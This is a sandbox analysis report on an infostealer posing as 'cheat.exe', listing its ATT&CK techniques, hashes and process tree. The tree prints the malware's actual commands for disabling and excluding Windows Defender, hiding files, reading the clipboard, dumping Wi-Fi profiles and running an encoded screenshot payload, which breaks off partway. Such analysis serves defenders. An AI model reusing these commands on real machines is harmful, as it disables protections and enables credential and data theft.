6bf1daad846fc87fe65a1487eed19f64a71f597ca4850c4b3fab371bfcd6749d

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-01-2025 04:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cheat.exe
Size

10.0MB
MD5

2ffd878c5c9dca41f147e0e0fc0a6d35
SHA1

96697b119909c1f04cb5ac8f4dca34df08126c7f
SHA256

5740a9e3eaa603b2e9f86932df5ab6b59f8baab82163a163343c9f46825a6849
SHA512

0eb5487ce01d927a297d8ee6e1e0a3cb0313f3824ddef33a896bd9786921c502bd86cebcb8a810523bb971e225ef2e8ded2920bb119faa7f5f5a420a669ca8be
SSDEEP

196608:Vo0lTceNTfm/pf+xk4dGWV3RimrbW3jmyZ:FHy/pWu4EWVRimrbmyC

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1420	powershell.exe
392	powershell.exe
3628	powershell.exe
2952	powershell.exe
3216	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4404	cmd.exe
1440	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1672	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe
3752	cheat.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4876	tasklist.exe
4480	tasklist.exe
888	tasklist.exe
3808	tasklist.exe
2532	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1900	cmd.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000b000000023b9d-63.dat	upx
behavioral2/memory/3752-67-0x00007FFA2AF80000-0x00007FFA2B568000-memory.dmp	upx
behavioral2/files/0x000a000000023b69-69.dat	upx
behavioral2/files/0x000a000000023b9b-72.dat	upx
behavioral2/memory/3752-74-0x00007FFA43B80000-0x00007FFA43B8F000-memory.dmp	upx
behavioral2/memory/3752-71-0x00007FFA3E240000-0x00007FFA3E264000-memory.dmp	upx
behavioral2/files/0x000a000000023b6e-127.dat	upx
behavioral2/files/0x000a000000023b6d-126.dat	upx
behavioral2/files/0x000a000000023b6c-125.dat	upx
behavioral2/files/0x000a000000023b6b-124.dat	upx
behavioral2/files/0x000a000000023b6a-123.dat	upx
behavioral2/files/0x000a000000023b68-122.dat	upx
behavioral2/files/0x0009000000023bbc-121.dat	upx
behavioral2/files/0x000e000000023bae-120.dat	upx
behavioral2/files/0x000a000000023ba7-119.dat	upx
behavioral2/files/0x000a000000023b9c-116.dat	upx
behavioral2/files/0x000a000000023b9a-115.dat	upx
behavioral2/memory/3752-132-0x00007FFA3AB90000-0x00007FFA3ABBD000-memory.dmp	upx
behavioral2/memory/3752-133-0x00007FFA41EE0000-0x00007FFA41EF9000-memory.dmp	upx
behavioral2/memory/3752-134-0x00007FFA3AB60000-0x00007FFA3AB83000-memory.dmp	upx
behavioral2/memory/3752-135-0x00007FFA39E20000-0x00007FFA39F93000-memory.dmp	upx
behavioral2/memory/3752-136-0x00007FFA40360000-0x00007FFA40379000-memory.dmp	upx
behavioral2/memory/3752-137-0x00007FFA430C0000-0x00007FFA430CD000-memory.dmp	upx
behavioral2/memory/3752-138-0x00007FFA3AB30000-0x00007FFA3AB5E000-memory.dmp	upx
behavioral2/memory/3752-143-0x00007FFA3E240000-0x00007FFA3E264000-memory.dmp	upx
behavioral2/memory/3752-142-0x00007FFA2AC00000-0x00007FFA2AF75000-memory.dmp	upx
behavioral2/memory/3752-140-0x00007FFA3A800000-0x00007FFA3A8B8000-memory.dmp	upx
behavioral2/memory/3752-139-0x00007FFA2AF80000-0x00007FFA2B568000-memory.dmp	upx
behavioral2/memory/3752-145-0x00007FFA3E4B0000-0x00007FFA3E4C4000-memory.dmp	upx
behavioral2/memory/3752-144-0x00007FFA43B80000-0x00007FFA43B8F000-memory.dmp	upx
behavioral2/memory/3752-147-0x00007FFA3E290000-0x00007FFA3E29D000-memory.dmp	upx
behavioral2/memory/3752-146-0x00007FFA3AB90000-0x00007FFA3ABBD000-memory.dmp	upx
behavioral2/memory/3752-149-0x00007FFA3A160000-0x00007FFA3A27C000-memory.dmp	upx
behavioral2/memory/3752-148-0x00007FFA41EE0000-0x00007FFA41EF9000-memory.dmp	upx
behavioral2/memory/3752-172-0x00007FFA3AB60000-0x00007FFA3AB83000-memory.dmp	upx
behavioral2/memory/3752-184-0x00007FFA39E20000-0x00007FFA39F93000-memory.dmp	upx
behavioral2/memory/3752-248-0x00007FFA40360000-0x00007FFA40379000-memory.dmp	upx
behavioral2/memory/3752-322-0x00007FFA3AB30000-0x00007FFA3AB5E000-memory.dmp	upx
behavioral2/memory/3752-325-0x00007FFA3A800000-0x00007FFA3A8B8000-memory.dmp	upx
behavioral2/memory/3752-328-0x00007FFA2AC00000-0x00007FFA2AF75000-memory.dmp	upx
behavioral2/memory/3752-329-0x00007FFA3E4B0000-0x00007FFA3E4C4000-memory.dmp	upx
behavioral2/memory/3752-356-0x00007FFA39E20000-0x00007FFA39F93000-memory.dmp	upx
behavioral2/memory/3752-364-0x00007FFA3A160000-0x00007FFA3A27C000-memory.dmp	upx
behavioral2/memory/3752-350-0x00007FFA2AF80000-0x00007FFA2B568000-memory.dmp	upx
behavioral2/memory/3752-351-0x00007FFA3E240000-0x00007FFA3E264000-memory.dmp	upx
behavioral2/memory/3752-379-0x00007FFA3A160000-0x00007FFA3A27C000-memory.dmp	upx
behavioral2/memory/3752-390-0x00007FFA3A800000-0x00007FFA3A8B8000-memory.dmp	upx
behavioral2/memory/3752-389-0x00007FFA3AB30000-0x00007FFA3AB5E000-memory.dmp	upx
behavioral2/memory/3752-388-0x00007FFA430C0000-0x00007FFA430CD000-memory.dmp	upx
behavioral2/memory/3752-387-0x00007FFA40360000-0x00007FFA40379000-memory.dmp	upx
behavioral2/memory/3752-386-0x00007FFA39E20000-0x00007FFA39F93000-memory.dmp	upx
behavioral2/memory/3752-385-0x00007FFA3AB60000-0x00007FFA3AB83000-memory.dmp	upx
behavioral2/memory/3752-384-0x00007FFA41EE0000-0x00007FFA41EF9000-memory.dmp	upx
behavioral2/memory/3752-383-0x00007FFA3AB90000-0x00007FFA3ABBD000-memory.dmp	upx
behavioral2/memory/3752-382-0x00007FFA43B80000-0x00007FFA43B8F000-memory.dmp	upx
behavioral2/memory/3752-381-0x00007FFA3E240000-0x00007FFA3E264000-memory.dmp	upx
behavioral2/memory/3752-380-0x00007FFA2AC00000-0x00007FFA2AF75000-memory.dmp	upx
behavioral2/memory/3752-378-0x00007FFA3E290000-0x00007FFA3E29D000-memory.dmp	upx
behavioral2/memory/3752-377-0x00007FFA3E4B0000-0x00007FFA3E4C4000-memory.dmp	upx
behavioral2/memory/3752-365-0x00007FFA2AF80000-0x00007FFA2B568000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3240	cmd.exe
4440	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3156	cmd.exe
4852	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1096	WMIC.exe
4936	WMIC.exe
1928	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4640	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4440	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3628	powershell.exe
1420	powershell.exe
3628	powershell.exe
1420	powershell.exe
392	powershell.exe
392	powershell.exe
1440	powershell.exe
1440	powershell.exe
2372	powershell.exe
1440	powershell.exe
2372	powershell.exe
2372	powershell.exe
2952	powershell.exe
2952	powershell.exe
1256	powershell.exe
1256	powershell.exe
3216	powershell.exe
3216	powershell.exe
840	powershell.exe
840	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2532	tasklist.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeIncreaseQuotaPrivilege	4852	WMIC.exe
Token: SeSecurityPrivilege	4852	WMIC.exe
Token: SeTakeOwnershipPrivilege	4852	WMIC.exe
Token: SeLoadDriverPrivilege	4852	WMIC.exe
Token: SeSystemProfilePrivilege	4852	WMIC.exe
Token: SeSystemtimePrivilege	4852	WMIC.exe
Token: SeProfSingleProcessPrivilege	4852	WMIC.exe
Token: SeIncBasePriorityPrivilege	4852	WMIC.exe
Token: SeCreatePagefilePrivilege	4852	WMIC.exe
Token: SeBackupPrivilege	4852	WMIC.exe
Token: SeRestorePrivilege	4852	WMIC.exe
Token: SeShutdownPrivilege	4852	WMIC.exe
Token: SeDebugPrivilege	4852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4852	WMIC.exe
Token: SeRemoteShutdownPrivilege	4852	WMIC.exe
Token: SeUndockPrivilege	4852	WMIC.exe
Token: SeManageVolumePrivilege	4852	WMIC.exe
Token: 33	4852	WMIC.exe
Token: 34	4852	WMIC.exe
Token: 35	4852	WMIC.exe
Token: 36	4852	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4852	WMIC.exe
Token: SeSecurityPrivilege	4852	WMIC.exe
Token: SeTakeOwnershipPrivilege	4852	WMIC.exe
Token: SeLoadDriverPrivilege	4852	WMIC.exe
Token: SeSystemProfilePrivilege	4852	WMIC.exe
Token: SeSystemtimePrivilege	4852	WMIC.exe
Token: SeProfSingleProcessPrivilege	4852	WMIC.exe
Token: SeIncBasePriorityPrivilege	4852	WMIC.exe
Token: SeCreatePagefilePrivilege	4852	WMIC.exe
Token: SeBackupPrivilege	4852	WMIC.exe
Token: SeRestorePrivilege	4852	WMIC.exe
Token: SeShutdownPrivilege	4852	WMIC.exe
Token: SeDebugPrivilege	4852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4852	WMIC.exe
Token: SeRemoteShutdownPrivilege	4852	WMIC.exe
Token: SeUndockPrivilege	4852	WMIC.exe
Token: SeManageVolumePrivilege	4852	WMIC.exe
Token: 33	4852	WMIC.exe
Token: 34	4852	WMIC.exe
Token: 35	4852	WMIC.exe
Token: 36	4852	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4936	WMIC.exe
Token: SeSecurityPrivilege	4936	WMIC.exe
Token: SeTakeOwnershipPrivilege	4936	WMIC.exe
Token: SeLoadDriverPrivilege	4936	WMIC.exe
Token: SeSystemProfilePrivilege	4936	WMIC.exe
Token: SeSystemtimePrivilege	4936	WMIC.exe
Token: SeProfSingleProcessPrivilege	4936	WMIC.exe
Token: SeIncBasePriorityPrivilege	4936	WMIC.exe
Token: SeCreatePagefilePrivilege	4936	WMIC.exe
Token: SeBackupPrivilege	4936	WMIC.exe
Token: SeRestorePrivilege	4936	WMIC.exe
Token: SeShutdownPrivilege	4936	WMIC.exe
Token: SeDebugPrivilege	4936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4936	WMIC.exe
Token: SeRemoteShutdownPrivilege	4936	WMIC.exe
Token: SeUndockPrivilege	4936	WMIC.exe
Token: SeManageVolumePrivilege	4936	WMIC.exe
Token: 33	4936	WMIC.exe
Token: 34	4936	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4312 wrote to memory of 3752	4312	cheat.exe	82
PID 4312 wrote to memory of 3752	4312	cheat.exe	82
PID 3752 wrote to memory of 4972	3752	cheat.exe	83
PID 3752 wrote to memory of 4972	3752	cheat.exe	83
PID 3752 wrote to memory of 2584	3752	cheat.exe	84
PID 3752 wrote to memory of 2584	3752	cheat.exe	84
PID 3752 wrote to memory of 3324	3752	cheat.exe	85
PID 3752 wrote to memory of 3324	3752	cheat.exe	85
PID 3324 wrote to memory of 2532	3324	cmd.exe	89
PID 3324 wrote to memory of 2532	3324	cmd.exe	89
PID 2584 wrote to memory of 3628	2584	cmd.exe	90
PID 2584 wrote to memory of 3628	2584	cmd.exe	90
PID 4972 wrote to memory of 1420	4972	cmd.exe	91
PID 4972 wrote to memory of 1420	4972	cmd.exe	91
PID 3752 wrote to memory of 424	3752	cheat.exe	93
PID 3752 wrote to memory of 424	3752	cheat.exe	93
PID 424 wrote to memory of 4852	424	cmd.exe	95
PID 424 wrote to memory of 4852	424	cmd.exe	95
PID 3752 wrote to memory of 2372	3752	cheat.exe	96
PID 3752 wrote to memory of 2372	3752	cheat.exe	96
PID 2372 wrote to memory of 384	2372	cmd.exe	98
PID 2372 wrote to memory of 384	2372	cmd.exe	98
PID 3752 wrote to memory of 3656	3752	cheat.exe	99
PID 3752 wrote to memory of 3656	3752	cheat.exe	99
PID 3656 wrote to memory of 3132	3656	cmd.exe	101
PID 3656 wrote to memory of 3132	3656	cmd.exe	101
PID 3752 wrote to memory of 1032	3752	cheat.exe	102
PID 3752 wrote to memory of 1032	3752	cheat.exe	102
PID 1032 wrote to memory of 4936	1032	cmd.exe	104
PID 1032 wrote to memory of 4936	1032	cmd.exe	104
PID 3752 wrote to memory of 1000	3752	cheat.exe	105
PID 3752 wrote to memory of 1000	3752	cheat.exe	105
PID 1000 wrote to memory of 1928	1000	cmd.exe	107
PID 1000 wrote to memory of 1928	1000	cmd.exe	107
PID 3752 wrote to memory of 1900	3752	cheat.exe	108
PID 3752 wrote to memory of 1900	3752	cheat.exe	108
PID 3752 wrote to memory of 1140	3752	cheat.exe	110
PID 3752 wrote to memory of 1140	3752	cheat.exe	110
PID 1140 wrote to memory of 392	1140	cmd.exe	113
PID 1140 wrote to memory of 392	1140	cmd.exe	113
PID 1900 wrote to memory of 4380	1900	cmd.exe	112
PID 1900 wrote to memory of 4380	1900	cmd.exe	112
PID 3752 wrote to memory of 4020	3752	cheat.exe	114
PID 3752 wrote to memory of 4020	3752	cheat.exe	114
PID 3752 wrote to memory of 1964	3752	cheat.exe	116
PID 3752 wrote to memory of 1964	3752	cheat.exe	116
PID 3752 wrote to memory of 2664	3752	cheat.exe	118
PID 3752 wrote to memory of 2664	3752	cheat.exe	118
PID 3752 wrote to memory of 4404	3752	cheat.exe	119
PID 3752 wrote to memory of 4404	3752	cheat.exe	119
PID 1964 wrote to memory of 4876	1964	cmd.exe	122
PID 1964 wrote to memory of 4876	1964	cmd.exe	122
PID 4020 wrote to memory of 4480	4020	cmd.exe	123
PID 4020 wrote to memory of 4480	4020	cmd.exe	123
PID 3752 wrote to memory of 2832	3752	cheat.exe	124
PID 3752 wrote to memory of 2832	3752	cheat.exe	124
PID 3752 wrote to memory of 4528	3752	cheat.exe	126
PID 3752 wrote to memory of 4528	3752	cheat.exe	126
PID 3752 wrote to memory of 3156	3752	cheat.exe	127
PID 3752 wrote to memory of 3156	3752	cheat.exe	127
PID 3752 wrote to memory of 1984	3752	cheat.exe	129
PID 3752 wrote to memory of 1984	3752	cheat.exe	129
PID 4404 wrote to memory of 1440	4404	cmd.exe	131
PID 4404 wrote to memory of 1440	4404	cmd.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4380	attrib.exe
2132	attrib.exe
1376	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\cheat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4312
- C:\Users\Admin\AppData\Local\Temp\cheat.exe
  "C:\Users\Admin\AppData\Local\Temp\cheat.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cheat.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cheat.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3324
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2372
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cheat.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cheat.exe"
      4⤵
      Views/modifies file attributes
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4020
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1964
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2664
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4528
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3156
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1984
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3564
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAb